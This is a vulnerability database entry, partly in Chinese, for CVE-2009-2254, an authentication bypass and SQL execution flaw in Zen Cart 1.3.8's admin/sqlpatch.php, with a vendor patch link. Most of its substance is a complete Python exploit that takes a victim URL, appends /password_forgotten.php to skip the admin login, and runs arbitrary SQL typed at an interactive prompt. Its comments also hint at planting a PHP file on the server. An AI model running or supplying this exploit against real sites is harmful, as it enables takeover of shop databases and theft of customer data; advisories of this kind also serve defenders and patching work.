Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:12208
HistorySep 05, 2009 - 12:00 a.m.

Zen Cart admin/sqlpatch.php模块SQL注入漏洞

2009-09-0500:00:00
Root
www.seebug.org
18

EPSS

0.098

Percentile

94.8%

JSON

BugCVE: CVE-2009-2254
BUGTRAQ: 35468

Zen Cart没有对admin/sqlpatch.php模块强制管理认证,这允许远程攻击者在请求中通过query_string和PATH_INFO参数执行SQL注入攻击。

Zen Cart 1.3.8
厂商补丁:

Zen Ventures

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.zen-cart.com/forum/showthread.php?t=130161


                                                #!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#	DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#	DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
	global a, b
	for param in sys.argv:
		if(param == '-'+name): return str(sys.argv[b+1])
		b = b + 1
	if(need):
		print '\n#error', "-"+name, 'parameter required'
		exit(1)

if (len(sys.argv) < 2):
	print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <[email protected]>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                 |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
	"""
	exit(1)
	
url, trick = option('url', 1), "/password_forgotten.php"

while True:
	cmd = raw_input('sql@jah$ ') 
	if (cmd == "exit"): exit(1)
	req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
	if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
		print '>> success (', cmd, ")"
	else:
		print '>> failed, be sure to end with ; (', cmd, ")"

Related

prion 1
exploitdb 1
nvd 1
cve 1
cvelist 1
nessus 1
openvas 1
prion
prion
Sql injection
2009-06-30 10:30:00
exploitdb
exploitdb
Zen Cart 1.3.8 - SQL Execution
2009-06-23 00:00:00
nvd
nvd
CVE-2009-2254
2009-06-30 10:30:11
cve
cve
CVE-2009-2254
2009-06-30 10:30:11
cvelist
cvelist
CVE-2009-2254
2009-06-30 10:00:00
nessus
nessus
Zen Cart password_forgotten.php Admin Access Bypass
2009-06-24 00:00:00
openvas
openvas
Zen Cart <= 1.3.8a Multiple Vulnerabilities
2009-07-03 00:00:00

EPSS

0.098

Percentile

94.8%

JSON
Related for SSV:12208
prion1exploitdb1nvd1cve1cvelist1nessus1openvas1